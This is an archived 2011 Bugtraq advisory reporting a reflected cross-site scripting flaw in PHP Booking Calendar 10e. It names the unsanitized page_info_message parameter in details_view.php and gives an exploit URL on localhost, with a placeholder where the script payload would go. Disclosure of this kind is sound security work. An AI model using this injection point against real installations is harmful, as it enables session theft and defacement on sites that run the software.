lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <b9dcb7890ca34a661c373d930fdaa9b5@g13net.com> Date: Sun, 18 Dec 2011 15:15:36 -0500 From: tom <tom@...net.com> To: <bugtraq@...urityfocus.com> Subject: PHP Booking Calendar 10e XSS # Exploit Title: PHP Booking Calendar 10e XSS # Date: 12/16/11 # Author: G13 # Software Link: http://sourceforge.net/projects/bookingcalendar/ # Version: 10e # Category: webapps (php) # ##### Vulnerability ##### The page_info_message varibale in the details_view.php does not sanitize input. This is a relective XSS attack. ##### Exploit ##### http://127.0.0.1/cal/details_view.php?event_id=1&date=2011-12-01&view=month&loc=loc1&page_info_message=[XSS]